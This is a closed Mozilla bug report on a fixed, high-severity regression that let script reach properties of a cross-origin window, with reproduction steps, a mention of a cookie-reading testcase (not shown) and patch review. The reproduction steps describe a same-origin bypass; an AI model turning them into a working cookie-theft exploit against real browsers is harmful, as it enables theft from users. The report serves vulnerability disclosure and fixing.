Closed Bug 605167 Opened 11 years ago Closed 11 years ago

It's possible to access properties of a cross-origin window


(Core :: Security, defect)

Windows XP
Not set



Tracking Status
blocking2.0 --- beta7+
status1.9.2 --- unaffected
status1.9.1 --- unaffected


(Reporter: moz_bug_r_a4, Assigned: mrbkap)



(Keywords: regression, Whiteboard: [sg:high]fixed-in-tracemonkey)


(2 files)

This is a regression from landing of compartments.

1. Get a function from a same-origin window.
2. Load a cross-origin page in that window.

With that function, ComputeGlobalThis gets an outer window proxy that belongs
to the cross-origin window.  Thus, it's possible to access properties of the
cross-origin window via that outer window proxy.

The attached testcase aborts a debug build:
Assertion failure: compartment mismatched, at
Attached file testcase
This tries to get cookies for
Blocks: compartments
blocking2.0: --- → beta7+
Assignee: nobody → mrbkap
Attached patch FixSplinter Review
Andreas has a patch in bug 604516 that gets rid of the inner and outer object hooks in favor of slots with the outer object for that compartment. That'll make this patch obsolete, but the upshot here is that we need to make sure that when we outerize, we return the outer window for the right compartment.

I looked through all of the cases where we outerize and it appeared that there were exactly two where we actually wanted the uncompartmentalized outer window (both in WrapperFactory.cpp).
Attachment #484098 - Flags: review?(peterv)
Attachment #484098 - Flags: review?(lw)
Comment on attachment 484098 [details] [diff] [review]

Sorry, I enjoyed the discussion, but I am unqualified to review this.
Attachment #484098 - Flags: review?(lw)
Comment on attachment 484098 [details] [diff] [review]

Please add an automated testcase.
Attachment #484098 - Flags: review?(peterv) → review+
Keywords: regression
Whiteboard: fixed-in-tracemonkey → [sg:high]fixed-in-tracemonkey
Group: core-security
You need to log in before you can comment on or make changes to this bug.